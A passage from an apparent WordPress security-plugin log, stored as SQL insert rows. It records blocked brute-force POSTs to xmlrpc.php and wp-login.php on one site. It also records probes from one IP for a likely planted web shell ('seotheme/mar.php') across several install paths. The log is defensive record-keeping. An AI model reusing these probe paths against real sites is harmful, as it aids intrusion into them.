Firefox\\/96\"}','L04HAu5QGcmU8Tb9St1Ysex2',0,1664544712.8323,19814,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xaer24GoiZpI53d1TNEX79CF',0,1664544865.1043,504,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','13fUbSxEWpihFvKkDG2JeVol',0,1664544909.5956,1278,'','POST',403,0,600,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','5T2Y0qUAERBQOmybKh1L7tFC',0,1664545048.9559,1186,'','POST',403,0,515,0,1,'',0),('51.79.30.143',860823183,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gi0pvI87JdcBbYtw1es3L9Nk',0,1664545184.7544,1271,'','POST',403,0,515,0,1,'',0),('106.14.141.22',1779338518,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BcAnGk9txg6Wvsq7Q0EiS38b',0,1664545498.7970,1232,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tQHo2z90LMCWOVfKlngb4jwG',0,1664545707.4905,1304,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1UvrA9Kt2XgiCk5VcbMleOIW',0,1664545833.6423,1520,'','POST',403,0,515,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lDFCO1n2p0wdKEfV8xtmXbo4',0,1664546059.3663,18376,'','POST',403,0,515,0,1,'',0),('81.88.53.17',1364735249,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rJ3WcjshVLbRv60IEeQUtZqo',0,1664546188.0364,1222,'','POST',403,0,515,0,1,'',0),('198.46.81.47',3324924207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oxWhaPz9BeN1iJtFcnrylsMp',0,1664546364.3627,1457,'','POST',403,0,515,0,1,'',0),('157.245.246.208',2650142416,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Zo3jXdNTztmFUvsEYGfJynxk',0,1664546866.0373,18949,'','POST',403,0,515,0,1,'',0),('162.241.126.46',2733735470,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YDzIAfMyV80N9Q5PsimpXkc3',0,1664547080.9256,1711,'','POST',403,0,515,0,1,'',0),('212.38.40.215',3559270615,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','se4cN1bxGuAOqktjYM2iovyF',0,1664547220.1946,1325,'','POST',403,0,515,0,1,'',0),('18.206.253.21',315555093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NwAKBHyOxRdn2DIJ04fhvqFc',0,1664547426.8136,1484,'','POST',403,0,515,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VIQMEjDCW80aZ1vqiofbm5XG',0,1664547576.9800,1221,'','POST',403,0,515,0,1,'',0),('111.90.150.28',1868207644,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JOG8X0i4SzchH3dDQsZFbfAu',0,1664547779.9053,19190,'','POST',403,0,515,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','9tId6Knr7mB0eoE5qVuXiFSO',0,1664548148.5164,319,'','GET',403,0,700,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','qZsiW30XD9hbVyopYHcfv64j',0,1664548159.3934,355,'','GET',403,0,700,0,1,'',0),('40.122.149.171',679122347,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YXhcHJFugj8qKpt5ynNm42CL',0,1664548161.2546,1237,'','POST',403,0,515,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','vwP4leb2KaZm1jOhqrFHnM9X',0,1664548170.5799,280,'','GET',403,0,700,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/blog/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','eYTiGlv23QVb8anD0EyNUcf9',0,1664548179.1103,274,'','GET',403,0,700,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/site/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','w4B0K5mnWSUEhveJMjkXrAiP',0,1664548190.1482,333,'','GET',403,0,700,0,1,'',0),('66.45.251.157',1110309789,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','okE4hrtylu9nTdpAOeGPq8HM',0,1664548319.9352,1286,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','t9CAklJjU3cOFN1Yun6vdbSz',0,1664548532.2967,13454,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NOLuC59R4UHer8BFjtMkwf0T',0,1664548687.3441,1283,'','POST',403,0,515,0,1,'',0),('159.89.170.41',2673453609,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IJhfRb2YlTowcsj1HmKPgtVN',0,1664548899.5063,1312,'','POST',403,0,515,0,1,'',0),('5.101.157.25',90545433,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Xw08n3gpMIJt1hxkWve2fVAl',0,1664549097.3255,1251,'','POST',403,0,515,0,1,'',0),('87.106.228.6',1466622982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ugQ4rY7KOsNCWImR5dvETayA',0,1664549458.6380,2238,'','POST',403,0,515,0,1,'',0),('162.240.216.162',2733693090,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JhHyxgW4r2fusVCnBtzTjvRP',0,1664549699.0770,1367,'','POST',403,0,515,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','f8SMuXk7UD5oR2jO3pBZgIw9',0,1664549834.3499,1275,'','POST',403,0,515,0,1,'',0),('194.242.56.232',3270654184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4Eb1GdPMfCScHiBYsDzIJvOW',0,1664550068.2924,11990,'','POST',403,0,515,0,1,'',0),('213.165.237.48',3584421168,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BSbChjL1w7TeROpZ9yvDrmQJ',0,1664550233.3870,1418,'','POST',403,0,515,0,1,'',0),('46.229.214.93',786814557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LdS3JPExKoQa6CqM8I2VgrT5',0,1664550457.7958,1407,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','9zsD0JKcu2bdWmVrEOLQxBvF',0,1664550664.4201,1744,'','POST',403,0,600,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','z1mHNvG6Qqy2bEnfjWICsuow',0,1664550801.0045,463,'','POST',403,0,600,0,1,'',0),('23.97.183.204',392280012,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','Iu0YWBSvzysZg4DcbXalUqQF',0,1664550803.4178,538,'','POST',403,0,600,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','4E7vzWPIe8nC3UsT5a1DKjbR',0,1664550807.4002,489,'','POST',403,0,600,0,1,'',0),('31.170.166.130',531277442,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','nswcCoSkvTZ3WLGqJ9542KOd',0,1664550809.4005,493,'','POST',403,0,600,0,1,'',0),('65.2.119.66',1090680642,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','RAaUzWbhjIK0pHcO6FQXN2ti',0,1664550817.1502,575,'','POST',403,0,600,0,1,'',0),('185.107.113.246',3110826486,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','5qye7TKArnIgZwukoFs6E39v',0,1664550820.9412,500,'','POST',403,0,600,0,1,'',0),('82.156.45.135',1385966983,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','vO1VA0r6I5qCEx8azZbXptDn',0,1664550826.7072,992,'','POST',403,0,600,0,1,'',0),('209.151.148.49',3516372017,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','mMtClx2fbBrS1KnJF8cWOzTD',0,1664550826.0125,1692,'','POST',403,0,600,0,1,'',0),('50.59.99.98',842752866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6mvcuyF5IpaP1Lz2jCqr7hwX',0,1664550841.5828,1586,'','POST',403,0,515,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kURnsqti5L2jIBr1uOo7ZNvy',0,1664551229.1096,18407,'','POST',403,0,515,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wkXJpWcrBARb6tvyPSZ2g5Y9',0,1664551417.5533,16092,'','POST',403,0,515,0,1,'',0),('79.143.85.14',1334793486,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hsopydEtuGcn1vFwSP4l3g7b',0,1664551655.4383,18715,'','POST',403,0,515,0,1,'',0),('18.224.85.64',316691776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lmg3YFhBIxX6VQe82u4bycTd',0,1664552048.3263,18367,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hEM4PAtQOFSNUkGgWb81Ryqe',0,1664552228.3968,18537,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CALkEyVcvughzoTp1bmYliwd',0,1664552459.5443,18288,'','POST',403,0,515,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yOcUkHnhWSY0Lb46dipQwam3',0,1664552626.2553,18027,'','POST',403,0,515,0,1,'',0),('137.184.132.157',2310571165,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0ad9nL3IWVHtFmUv6xDhBK1i',0,1664552853.1856,18492,'','POST',403,0,515,0,1,'',0),('199.201.110.199',3351867079,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EkwDsbguOe3pKj57MVBmYNzR',0,1664553480.8292,18663,'','POST',403,0,515,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ClPJjqLwiGrbZ9XfWRDaIcBx',0,1664553910.6950,19776,'','POST',403,0,515,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jGz7hDSCNtpIbT6k2X0qrJEV',0,1664554088.8684,18561,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3mljz2YxyBsoMSZkQfOLTJGH',0,1664554320.4553,18476,'','POST',403,0,515,0,1,'',0),('178.124.210.118',2994524790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aM6SCjAzNYKxnUWZioEpF3cl',0,1664554732.8318,2435,'','POST',403,0,515,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Vgz48JDMdyvK971piENaA5Qx',0,1664554934.2613,18423,'','POST',403,0,515,0,1,'',0),('13.126.107.146',226388882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mE9h1cLCKdBNg8ZqPpaJTnUI',0,1664555173.6596,18561,'','POST',403,0,515,0,1,'',0),('217.21.74.40',3642051112,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','bgCJZsPneAzGpMRu3d46UILf',0,1664555318.3925,1409,'','POST',403,0,600,0,1,'',0),('51.124.226.192',863822528,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','EDMeb4c1PJrSsuofY26AIlNg',0,1664555318.9959,1314,'','POST',403,0,600,0,1,'',0),('185.250.202.147',3120220819,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','Sz1RNpGQoDJgU4FO6lMaxnsd',0,1664555319.6869,891,'','POST',403,0,600,0,1,'',0),('121.40.177.68',2032709956,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','i8qTVJrdmsCHUMPZ3FxAkDwn',0,1664555325.6427,1238,'','POST',403,0,600,0,1,'',0),('125.124.125.235',2105310699,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','fj38Mb9vR5yLlGHwWdPINsgE',0,1664555333.3127,506,'','POST',403,0,600,0,1,'',0),('46.17.172.162',772910242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','nyA0ZsrhTjH1bvmJpP9CI6a5',0,1664555336.0128,464,'','POST',403,0,600,0,1,'',0),('139.180.158.189',2343870141,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','1RypcMZB9Vibgw5uYzh4PdDO',0,1664555340.5910,471,'','POST',403,0,600,0,1,'',0),('185.250.202.147',3120220819,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','yLn8BsK29olbGMwmi3daHuFq',0,1664555344.0057,921,'','POST',403,0,600,0,1,'',0),('217.174.248.107',3652122731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sfMhmK1DZR6BCOqEaW9tApei',0,1664555344.3898,854,'','POST',403,0,515,0,1,'',0),('128.199.207.63',2160578367,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','UEsXkrnMLHKomWTpJhjwt4Av',0,1664555352.2817,511,'','POST',403,0,600,0,1,'',0),('34.86.229.13',576120077,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','Zp6sjVO3lrCS0UMebNgyPvDn',0,1664555356.1216,513,'','POST',403,0,600,0,1,'',0),('65.2.119.66',1090680642,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php\"}','sduJ3GXPbL9xwhKoNFqetQZH',0,1664555369.1704,458,'','POST',403,0,600,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','SbArENv0O1V6ITYl4u9WLUpo',0,1664555561.5511,1295,'','POST',403,0,600,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bmUeraMD2HLvGlTp61FwP84n',0,1664555592.9352,1325,'','POST',403,0,515,0,1,'',0),('139.180.157.5',2343869701,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dXb98fz6Le1mqTU4pDgBtVRi',0,1664556201.0305,2621,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','lsTQ9Bk58JEwoM4dRYCqzUAr',0,1664556342.4153,478,'','POST',403,0,600,0,1,'',0),('216.158.230.167',3634292391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PTH2O0irbhBQUJaftAcmFGV6',0,1664556442.6591,2935,'','POST',403,0,515,0,1,'',0),('103.56.160.61',1731764285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','quKrXh02nkJ8RLSaGcEzwNsd',0,1664556616.1492,2317,'','POST',403,0,515,0,1,'',0),('47.74.17.225',793383393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5L7cysaoFh2qYClUGm1Hwv9V',0,1664556856.7235,6083,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VtJOdoTfsRhXW8BqA3DQ6aG5',0,1664557940.1279,1266,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','uXTqEFScD2UNO0txGQ4wgVys',0,1664558105.6052,1566,'','POST',403,0,600,0,1,'',0),('154.38.163.180',2586223540,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','t9JAOiRcHyzevnP2Tf4glBLq',0,1664558200.9655,1268,'','POST',403,0,515,0,1,'',0),('103.90.235.70',1734011718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','S2akd7FYZfueWXVKMURHcw9C',0,1664558649.3936,6981,'','POST',403,0,515,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rmgQUbeWNGxdzpoHcAEw3hFy',0,1664558865.1496,1455,'','POST',403,0,515,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OUdjtJ4w1WqfFYs80kP3h9rZ',0,1664559113.3463,18220,'','POST',403,0,515,0,1,'',0),('213.52.130.41',3576988201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hOY0iKwzCmuXyVg4Z2e56ctl',0,1664559304.3316,1923,'','POST',403,0,515,0,1,'',0),('178.124.210.118',2994524790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','arxBcNSgpvijDdRMLfkUYZyl',0,1664559544.1223,18665,'','POST',403,0,515,0,1,'',0),('198.12.250.252',3322739452,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 